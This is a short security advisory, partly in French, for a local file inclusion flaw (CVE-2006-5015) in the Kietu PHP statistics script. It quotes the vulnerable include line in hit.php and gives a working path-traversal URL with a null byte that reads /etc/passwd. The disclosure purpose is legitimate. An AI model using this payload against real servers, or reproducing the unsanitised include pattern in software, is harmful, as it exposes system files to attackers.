Bug: Local File Inclusion : Kietu (WLB-2006100010 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Local File Inclusion : Kietu
 Credit: cdg393
 Date: 2006.10.01
 CWE: N/A
 CVE: CVE-2006-5015 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

[::] Produit : Kietu

[::] Langage : PHP

[::] Description : Kietu? est un script écrit en PHP, qui requiert une base de donnée mySQL, et qui vous
permet de générer et consulter les statistiques d'accès à votre site web.

[::] Site web officiel : http://www.Kietu.net/

[::] Page vulnérable : hit.php

[::] Faille de sécurité : Local File Inclusion

[::] Code vulnérable : ( Ligne 2 ) -> include_once $url_hit.'class/kdetect.class.php';

[::] Exploitation : http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00

@ [::] Crédit : Avis de sécurité par cdg393 -> cdg393_gmail_com :)

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com